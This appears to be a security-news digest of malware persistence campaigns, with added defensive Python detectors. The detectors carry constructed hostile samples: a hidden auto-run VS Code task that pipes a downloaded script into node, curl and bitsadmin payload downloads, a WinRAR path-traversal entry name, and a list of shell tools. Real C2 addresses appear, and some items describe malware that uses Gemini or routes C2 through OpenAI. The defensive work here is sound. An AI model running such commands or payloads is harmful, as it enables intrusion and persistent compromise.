ciso brief

All news with #persistence tag

38 articles

Microsoft Warns: WhatsApp-Delivered VBS Campaign Surfaces

⚠ Microsoft has warned of a late-February 2026 campaign that uses WhatsApp messages to deliver malicious Visual Basic Script (VBS) files that trigger a multi-stage infection chain. According to Microsoft Defender, the scripts create hidden folders under C:\ProgramData, drop renamed copies of Windows utilities (for example, curl.exe as netapi.dll and bitsadmin.exe as sc.exe), and retrieve second-stage payloads from trusted cloud providers. The attackers then attempt UAC tampering, modify registry entries, and install unsigned MSI packages to establish persistence and remote access, with some installers deploying legitimate remote-access tools.

WhatsApp VBS Malware Campaign Delivers MSI Backdoors

🛡️ Microsoft warns of a WhatsApp-distributed malware campaign that uses malicious Visual Basic Script (VBS) files to gain persistence and remote access on Windows systems. The VBS scripts perform delayed, multi-stage execution and deploy renamed legitimate utilities (for example, curl.exe and bitsadmin.exe) under misleading filenames to blend in. Payloads are hosted on reputable cloud providers and culminate in installing malicious Microsoft Installer (MSI) packages that act as backdoors. Microsoft recommends monitoring script and installer execution and watching for misuse of trusted system tools.
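A detection the two items above call for, added here as an example rather than Microsoft's own guidance: a renamed copy of curl.exe still carries curl.exe in its PE version resource, which Sysmon (Event ID 1) and Microsoft Defender process events expose as OriginalFileName, so comparing that field with the on-disk file name catches the masquerade, and the C:\ProgramData staging path gives a second signal. The events, the .cache folder name and the WATCHED set are constructed assumptions for the example.

```python
"""Flag renamed Windows utilities in process-creation telemetry.

Added example, not Microsoft's code. Copying curl.exe to netapi.dll changes the
on-disk name but not the PE version resource, so a Sysmon-style event still
reports OriginalFileName=curl.exe. The events below are constructed.
"""
import ntpath

# Utilities worth watching when they run under a different name (assumed list).
WATCHED = {"curl.exe", "bitsadmin.exe", "certutil.exe", "msiexec.exe"}

# Constructed process-creation events; field names follow Sysmon Event ID 1.
EVENTS = [
    {"Image": r"C:\ProgramData\.cache\netapi.dll", "OriginalFileName": "curl.exe",
     "CommandLine": r"netapi.dll -s -o C:\ProgramData\.cache\stage2.msi https://files.example.invalid/s2"},
    {"Image": r"C:\ProgramData\.cache\sc.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"sc.exe /transfer job /download /priority normal https://files.example.invalid/s3 C:\ProgramData\.cache\s3.msi"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe -sL https://example.org"},
    {"Image": r"C:\Windows\System32\sc.exe", "OriginalFileName": "sc.exe",
     "CommandLine": "sc.exe query"},
]


def is_renamed_lolbin(event):
    """True when a watched utility runs under a name that differs from its PE OriginalFileName."""
    original = event.get("OriginalFileName", "").lower()
    on_disk = ntpath.basename(event.get("Image", "")).lower()
    return original in WATCHED and original != on_disk


def runs_from_programdata(event):
    """True when the image lives under C:\\ProgramData, where the campaign stages its files."""
    image = event.get("Image", "").lower().replace("/", "\\")
    return image.startswith("c:\\programdata\\")


def triage(events):
    """Return (image path, OriginalFileName, reasons) for each suspicious event, in input order."""
    hits = []
    for event in events:
        reasons = []
        if is_renamed_lolbin(event):
            reasons.append(f"renamed {event['OriginalFileName']}")
        if runs_from_programdata(event):
            reasons.append("runs from ProgramData")
        if reasons:
            hits.append((event["Image"], event["OriginalFileName"], reasons))
    return hits


if __name__ == "__main__":
    for image, original, reasons in triage(EVENTS):
        print(f"{image} ({original}): {', '.join(reasons)}")
```

Both renamed binaries in the constructed set are flagged twice over, while the genuine curl.exe and sc.exe in System32 pass; in production the same comparison runs over the EDR's process table rather than a static list.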

Kubernetes Controllers as Stealthy Persistent Backdoors

🔒 Kubernetes clusters can be undermined by the very automation that makes them resilient. By registering a mutating admission webhook (a MutatingWebhookConfiguration) or compromising an existing controller, an attacker can intercept pod-creation requests and inject a covert sidecar; because the control loop re-applies the mutation every time a pod is recreated, the implant survives pod restarts and upgrades. The injected containers are easy to miss on casual inspection and can hide under benign names. Teams should audit webhook configurations, monitor RoleBindings and OwnerReferences, and restrict who can create or modify webhook registrations.
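An audit check for the webhook-injection pattern above, added as an example and not the article's tooling: a pod mutated at admission carries containers its Deployment's pod template never declared, and the MutatingWebhookConfiguration rules show which webhooks are positioned to do that. The Deployment, Pod and webhook objects are constructed in the shape kubectl get -o json returns; the object names, images and the 10.0.0.9 endpoint are invented.

```python
"""Spot admission-time sidecar injection in Kubernetes.

Added example, not from the original article. A mutating webhook changes the
Pod the API server stores, but not the PodTemplate in the owning Deployment,
so diffing the two exposes the injection; the webhook rules then say which
registrations can mutate pod CREATE requests. All objects below are constructed.
"""

# Constructed Deployment whose template declares a single container.
DEPLOYMENT = {
    "metadata": {"name": "web", "namespace": "prod"},
    "spec": {"template": {"spec": {"containers": [
        {"name": "web", "image": "registry.example/web:1.4"},
    ]}}},
}

# Constructed running Pod owned by that Deployment's ReplicaSet, carrying an extra container.
POD = {
    "metadata": {"name": "web-7d9f-abcde", "namespace": "prod",
                 "ownerReferences": [{"kind": "ReplicaSet", "name": "web-7d9f"}]},
    "spec": {"containers": [
        {"name": "web", "image": "registry.example/web:1.4"},
        {"name": "istio-proxy", "image": "ghcr.example/tools/agent:latest"},  # benign-looking name
    ]},
}

# Constructed MutatingWebhookConfiguration objects: one legitimate, one that mutates every pod.
WEBHOOKS = [
    {"metadata": {"name": "cert-manager-webhook"},
     "webhooks": [{"name": "webhook.cert-manager.io",
                   "clientConfig": {"service": {"name": "cert-manager-webhook", "namespace": "cert-manager"}},
                   "rules": [{"apiGroups": ["cert-manager.io"], "resources": ["certificates"],
                              "operations": ["CREATE", "UPDATE"]}]}]},
    {"metadata": {"name": "metrics-injector"},
     "webhooks": [{"name": "inject.metrics.internal",
                   "clientConfig": {"url": "https://10.0.0.9:8443/mutate"},
                   "rules": [{"apiGroups": [""], "resources": ["pods"], "operations": ["CREATE"]}],
                   "namespaceSelector": {}}]},
]


def injected_containers(pod, template_containers):
    """Containers present in the pod but absent from the owner's template, compared by (name, image)."""
    declared = {(c["name"], c["image"]) for c in template_containers}
    return [c for c in pod["spec"]["containers"] if (c["name"], c["image"]) not in declared]


def webhooks_mutating_pods(configs):
    """(configuration, webhook, endpoint) for every webhook whose rules match pod CREATE."""
    out = []
    for cfg in configs:
        for wh in cfg["webhooks"]:
            for rule in wh.get("rules", []):
                if "pods" in rule.get("resources", []) and "CREATE" in rule.get("operations", []):
                    client = wh.get("clientConfig", {})
                    # A URL-based webhook points outside the cluster's service mesh; worth a closer look.
                    endpoint = client.get("url") or "service/" + client.get("service", {}).get("name", "?")
                    out.append((cfg["metadata"]["name"], wh["name"], endpoint))
    return out


if __name__ == "__main__":
    template = DEPLOYMENT["spec"]["template"]["spec"]["containers"]
    for c in injected_containers(POD, template):
        print(f"{POD['metadata']['name']}: container {c['name']} ({c['image']}) not in Deployment template")
    for cfg, wh, endpoint in webhooks_mutating_pods(WEBHOOKS):
        print(f"{cfg}/{wh} mutates pod CREATE via {endpoint}")
```

Comparing by image as well as name matters: an attacker can keep a declared container name and swap only the image. Against a live cluster, feed the functions the output of kubectl get deploy, pods and mutatingwebhookconfigurations -o json.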

China-Linked Red Menshen Uses Stealthy BPFDoor Implants

🔒 A long-running espionage campaign attributed to the China-linked threat cluster Red Menshen has planted stealthy implants in telecom networks to maintain persistent, low-noise access. Rapid7 highlights BPFDoor, a Linux backdoor that attaches a Berkeley Packet Filter to a raw socket and stays dormant until a specifically crafted "magic" packet arrives, at which point it spawns a shell; it keeps no open listener and needs no conventional C2 channel. The actor also deploys CrossC2, Sliver, TinyShell, credential-harvesting tools and a controller that can operate inside victim environments to enable lateral movement and covert monitoring.

Silver Dragon: China-Nexus Espionage Targeting Governments

🐉 Silver Dragon is a China-nexus cyber espionage group focusing on government ministries and public sector organizations across Southeast Asia, with additional victims identified in Europe. The group gains access through exploitation of public-facing servers and targeted phishing campaigns. It maintains long-term persistence by hijacking legitimate Windows services and deploying a custom backdoor, GearDoor, which uses Google Drive for covert C2, blending malicious activity with trusted services to evade detection.

Ransomware Shift: Stealthy, Long-Term Access Tactics

🔒 Picus Security's annual Red Report finds ransomware operators shifting from noisy encryption to stealthy, long-term access, favoring persistence, defense evasion and data exfiltration. The firm reports a 38% drop in encryption activity as attackers prioritize double extortion and silent leaks, often routing C2 traffic through trusted services such as OpenAI and AWS. Experts urge stronger identity controls, monitoring of third-party integrations, and detections tuned to persistence and exfiltration.

Android malware uses Gemini AI to persist on devices

🔐 ESET researchers have identified an Android implant, dubbed PromptSpy, that uses generative AI to maintain persistence on victims' devices and that builds on the earlier VNCSpy samples. The implant sends serialized UI snapshots to Google's Gemini, receives step-by-step Accessibility Service actions that keep the malicious app pinned in Recent Apps, and executes them, while a VNC module provides remote viewing and control. The initial dropper impersonated JPMorgan Argentina and was distributed via mgardownload[.]com; communications run over AES-encrypted VNC to a hardcoded C2 at 54.67.2[.]84. PromptSpy also overlays invisible UI elements to block uninstallation, so removal requires rebooting into Safe Mode.

UNC6201 Targets Dell RecoverPoint Zero-Day, Deploys GRIMBOLT

🔐 Mandiant and the Google Threat Intelligence Group (GTIG) identified exploitation of a critical vulnerability in Dell RecoverPoint for Virtual Machines, CVE-2026-22769, used by UNC6201 since mid‑2024. The actor uploaded malicious WAR files to the embedded Tomcat Manager, authenticating with hard‑coded admin credentials, to deploy a SLAYSTYLE web shell and gain root. On compromised appliances, UNC6201 established persistence by modifying convert_hosts.sh and later replaced BRICKSTORM implants with a native AOT‑compiled C# backdoor named GRIMBOLT. Investigators also observed novel VMware pivoting techniques, including temporary "Ghost NICs" and iptables‑based Single Packet Authorization. Dell published mitigations, and GTIG/Mandiant released IOCs, YARA rules and hunting guidance to aid detection and response.

World Leaks Adds Stealthy RustyRocket Malware to Arsenal

🔐 Accenture has uncovered a novel malware named RustyRocket, deployed by the World Leaks extortion group to maintain stealthy persistence and proxy exfiltration across Windows and Linux environments. Written in Rust, the tool uses multi-layer encrypted tunnels, heavy obfuscation and a pre-encrypted runtime configuration that acts as a guardrail, together making its activity hard to detect and analyze. Accenture advises monitoring anomalous outbound transfers and enforcing network segmentation to limit lateral movement.

Crazy ransomware gang exploits employee monitoring

🛡️ Researchers at Huntress found the Crazy ransomware gang abusing legitimate employee-monitoring software alongside the SimpleHelp remote support tool to maintain persistence, evade detection, and prepare ransomware deployment. Attackers installed Net Monitor for Employees Professional via msiexec.exe to view desktops, transfer files, and execute commands, then added SimpleHelp for redundant access. Huntress warns organizations to enforce MFA and monitor for unauthorized remote-management tools.

VoidLink: Modular Linux Implant Framework Rising Activity

🛡️ Cisco Talos describes VoidLink as a modular implant management framework focused on Linux, providing advanced persistence, evasion, and plugin-based extensibility. The framework implements RBAC, mesh P2P communications, compile-on-demand plugins, and kernel-level components to hide implants and C2 infrastructure. Talos attributes VoidLink use to an actor tracked as UAT-9921, notes rapid AI-assisted development, and highlights cloud-aware scanning and broad targeting.

Attackers Prefer Stealthy Persistence for Extortion

🦠 Picus Security's Red Report 2026 analyzed over 1.1 million malicious files and 15.5 million actions, finding that attackers favor stealthy persistence and evasion to silently exfiltrate data for extortion. Process injection accounted for 30% of observed techniques, while adversaries routed C2 through high-reputation services such as OpenAI and AWS and used stolen browser passwords to masquerade as legitimate users. The report warns that virtualization/sandbox evasion and a rising number of techniques per sample make detection more challenging.

From Ransomware to Residency: The Shift to Stealth

🔍 The Picus Red Report 2026 analyzed more than 1.1 million malicious files and 15.5 million adversarial actions across 2025 and finds attackers shifting from disruptive ransomware to long-lived, stealthy residency. Rather than encrypting systems, adversaries focus on credential theft, process injection, sandbox evasion and quiet data exfiltration. The report urges defenders to prioritize behavior-based detection, credential hygiene and continuous adversarial validation to restore visibility.

RedKitten: Iran-linked campaign targets activists and NGOs

🔍 HarfangLab detected a Farsi-speaking, Iran-aligned campaign codenamed RedKitten in January 2026 that targets NGOs and individuals documenting recent human rights abuses. The operation begins with a Farsi-named 7‑Zip archive containing macro-laced Excel files; embedded VBA macros, which analysts say show signs of LLM generation, drop a C# implant via AppDomainManager injection. The backdoor, SloppyMIO, uses GitHub and Google Drive for steganographic configuration retrieval and leverages Telegram for command-and-control, supporting multiple modules to run commands, collect and exfiltrate files, deploy payloads and establish persistence.

Active Exploitation of Critical WinRAR CVE-2025-8088

⚠️ The Google Threat Intelligence Group (GTIG) has observed widespread exploitation of WinRAR through the critical path-traversal vulnerability CVE-2025-8088, which lets a crafted archive write files into the Windows Startup folder by abusing NTFS Alternate Data Streams (ADS). Adversaries, from Russian and Chinese government-backed groups to financially motivated operators, build RAR archives in which a visible decoy document carries hidden ADS entries whose names traverse out of the extraction folder, achieving persistence at the next logon. Defenders should prioritize installing the WinRAR patch, enable Safe Browsing protections, and hunt for ADS extraction activity and newly created Startup-folder LNK/HTA/BAT artifacts.
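A way to see where an ADS-bearing archive entry would land, added as an example and not GTIG's hunting tooling: the entry name is a decoy file name, a colon, and a stream name whose "..\" segments walk out of the extraction directory. The function approximates Win32 path normalisation with ntpath (the exact number of "..\" segments needed on a real system differs, which is why observed samples over-supply them) and reports entries that escape the extraction folder and end in a Startup directory with a startup-type extension. The entry names and the extraction path are constructed.

```python
"""Resolve where a RAR entry with an ADS name would be written on extraction.

Added example, not GTIG's tooling. The name "decoy.pdf:..\\..\\X\\Startup\\x.lnk"
yields a harmless decoy.pdf in the extraction folder, while the stream part,
passed through unsanitised by a vulnerable WinRAR, is normalised by Windows
so that each "..\\" climbs one directory. ntpath.normpath reproduces that
climb, including the clamp at the drive root. Names below are constructed.
"""
import ntpath

# Both the per-user and the all-users Startup folders end with this path (compared case-insensitively).
STARTUP_SUFFIX = r"\microsoft\windows\start menu\programs\startup"
# Extensions Windows will run from Startup at logon (assumed watch list).
PERSIST_EXT = {".lnk", ".hta", ".bat", ".cmd", ".vbs", ".js"}


def resolve_ads_entry(entry_name, extract_dir):
    """Return (decoy_path, stream_target, escapes_dir, lands_in_startup) for one archive entry.

    stream_target is None when the entry carries no alternate data stream.
    """
    decoy, sep, stream = entry_name.partition(":")
    decoy_path = ntpath.normpath(ntpath.join(extract_dir, decoy))
    if not sep:
        return decoy_path, None, False, False
    # Approximation of Win32 normalisation: the stream's "..\" segments climb from the decoy's directory.
    target = ntpath.normpath(ntpath.join(ntpath.dirname(decoy_path), stream))
    root = ntpath.normcase(extract_dir).rstrip("\\") + "\\"
    escapes = not ntpath.normcase(target).startswith(root)
    in_startup = ntpath.normcase(ntpath.dirname(target)).endswith(STARTUP_SUFFIX)
    return decoy_path, target, escapes, in_startup


def persistence_entries(entry_names, extract_dir):
    """(entry name, resolved path) for entries whose ADS escapes the folder and drops a startup-type file."""
    hits = []
    for name in entry_names:
        _, target, escapes, in_startup = resolve_ads_entry(name, extract_dir)
        if target and escapes and in_startup and ntpath.splitext(target)[1].lower() in PERSIST_EXT:
            hits.append((name, target))
    return hits


if __name__ == "__main__":
    # Constructed archive listing: a benign document, a benign ADS, and a traversal entry.
    listing = [
        "report.docx",
        "report.docx:Zone.Identifier",
        r"CV.pdf:..\..\..\..\..\..\..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk",
    ]
    for name, target in persistence_entries(listing, r"C:\Users\alice\Downloads"):
        print(f"{name!r} -> {target}")
```

The same resolver works on a listing pulled from any archive tool that prints raw entry names; anything that resolves outside the extraction directory is worth a look even when it misses the Startup suffix.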

Phishing Leads to LogMeIn RMM Deployment for Persistence

🔒 Cybersecurity researchers describe a two-wave phishing campaign that uses fake Greenvelope invitations to harvest Microsoft Outlook, Yahoo! and AOL credentials, then uses the stolen logins to register and deploy legitimate LogMeIn RMM tooling. Attackers deliver a signed executable, GreenVelopeCard.exe, carrying a JSON configuration that silently installs LogMeIn Resolve and connects it to an attacker-controlled URL. The RMM is configured for persistent, elevated access, and hidden scheduled tasks ensure it survives and keeps providing remote control.

Contagious Interview: VS Code Used as Attack Vector

⚠️ Threat actors tied to DPRK-backed Contagious Interview are weaponizing Visual Studio Code project configurations to execute malicious payloads when developers open and trust cloned repositories. Jamf Threat Labs observed attackers embedding commands in tasks.json that spawn shell processes to fetch and run obfuscated JavaScript via Node.js, establishing a persistent backdoor that can survive closing the IDE. Users should vet unfamiliar repos, inspect task and package files, and avoid running npm install without review.
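A scanner for the tasks.json pattern above, added as an example and not Jamf's detection: VS Code runs a task automatically when a trusted folder opens if the task sets runOptions.runOn to "folderOpen", and presentation.reveal "never" keeps its terminal panel out of sight. The sample tasks.json, its labels and the example.invalid URL are constructed; the SUSPECT word list is an assumption to tune per environment.

```python
"""Flag VS Code tasks that auto-run on folder open and reach for a shell or downloader.

Added example, not Jamf's tooling. VS Code reads .vscode/tasks.json as JSONC
(comments and trailing commas allowed), so the text is cleaned before parsing.
The tasks.json below is constructed to mirror the pattern in the report.
"""
import json
import re

# Interpreters and downloaders that have no business in an auto-run task (assumed list).
SUSPECT = re.compile(r"\b(node|curl|wget|bash|sh|zsh|powershell|pwsh|python|eval|base64)\b", re.I)

SAMPLE_TASKS_JSON = r'''{
  // Constructed example of a weaponised tasks.json
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
    },
    {
      "label": "Prepare environment",
      "type": "shell",
      "command": "curl -s https://example.invalid/setup.js | node -",
      "presentation": { "reveal": "never" },
      "runOptions": { "runOn": "folderOpen" },
    },
  ],
}'''


def strip_jsonc(text):
    """Drop block comments, whole-line // comments and trailing commas so json.loads accepts VS Code's JSONC."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)   # whole-line only, so "//" inside URLs survives
    text = re.sub(r",(\s*[}\]])", r"\1", text)           # simplification: does not guard commas inside strings
    return text


def task_command_line(task):
    """Join command and args into one string; each may be a string or a {"command": ...} object."""
    parts = []
    for piece in [task.get("command", "")] + list(task.get("args", [])):
        parts.append(piece["command"] if isinstance(piece, dict) else str(piece))
    return " ".join(parts)


def auto_run_tasks(tasks_json_text):
    """(label, command line, hidden) for every task configured to run when the folder opens."""
    doc = json.loads(strip_jsonc(tasks_json_text))
    hits = []
    for task in doc.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        hidden = task.get("presentation", {}).get("reveal") == "never"
        hits.append((task.get("label", "<unnamed>"), task_command_line(task), hidden))
    return hits


def suspicious_auto_run_tasks(tasks_json_text):
    """Auto-run tasks whose command line invokes an interpreter or downloader from SUSPECT."""
    return [hit for hit in auto_run_tasks(tasks_json_text) if SUSPECT.search(hit[1])]


if __name__ == "__main__":
    for label, cmd, hidden in suspicious_auto_run_tasks(SAMPLE_TASKS_JSON):
        print(f"auto-run task {label!r}{' (hidden)' if hidden else ''}: {cmd}")
```

Run it over every .vscode/tasks.json in a freshly cloned repository before trusting the workspace; the same runOn check applies to workspace .code-workspace files that embed a tasks section.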

Storm-0249 Shifts to Fileless Execution and DLL Sideloader

🚨 ReliaQuest warns that Storm-0249 appears to be evolving from an initial access broker into an active operator, adopting domain spoofing, DLL side-loading and fileless PowerShell execution to facilitate ransomware intrusions. The actor used a Microsoft-mimicking URL and the Windows Run dialog to fetch and execute a PowerShell script that installed a trojanized SentinelOne DLL via a malicious MSI. This technique leverages living-off-the-land utilities and signed processes to maintain persistence and evade detection.

WARP PANDA: Sophisticated China-Nexus Cloud Threats

🔍 CrowdStrike identified a China-nexus adversary, WARP PANDA, conducting covert intrusions against VMware vCenter and cloud infrastructure throughout 2025, deploying novel Golang implants and the backdoor BRICKSTORM. Operations emphasized stealth—log clearing, timestomping, unregistered VMs, and tunnelling via vCenter/ESXi/guest VMs—enabling long-term persistence and data staging from live VM snapshots. WARP PANDA also exfiltrated Microsoft 365 and SharePoint content, registered MFA devices, and abused cloud services for C2, prompting recommendations for tighter ESXi/vCenter controls and robust EDR on guests.

ShadowPad Delivered via WSUS Exploits CVE-2025-59287

🛡️ A recently patched WSUS deserialization flaw, CVE-2025-59287, has been weaponized to install the ShadowPad backdoor on Windows servers. AhnLab's ASEC reports attackers used PowerCat to spawn a CMD shell and then leveraged certutil and curl to retrieve payloads from 149.28.78.189:42306. ShadowPad was deployed via DLL side-loading of ETDApix.dll by ETDCtrlHelper.exe and runs as an in-memory loader with plugin support, anti-detection, and persistence.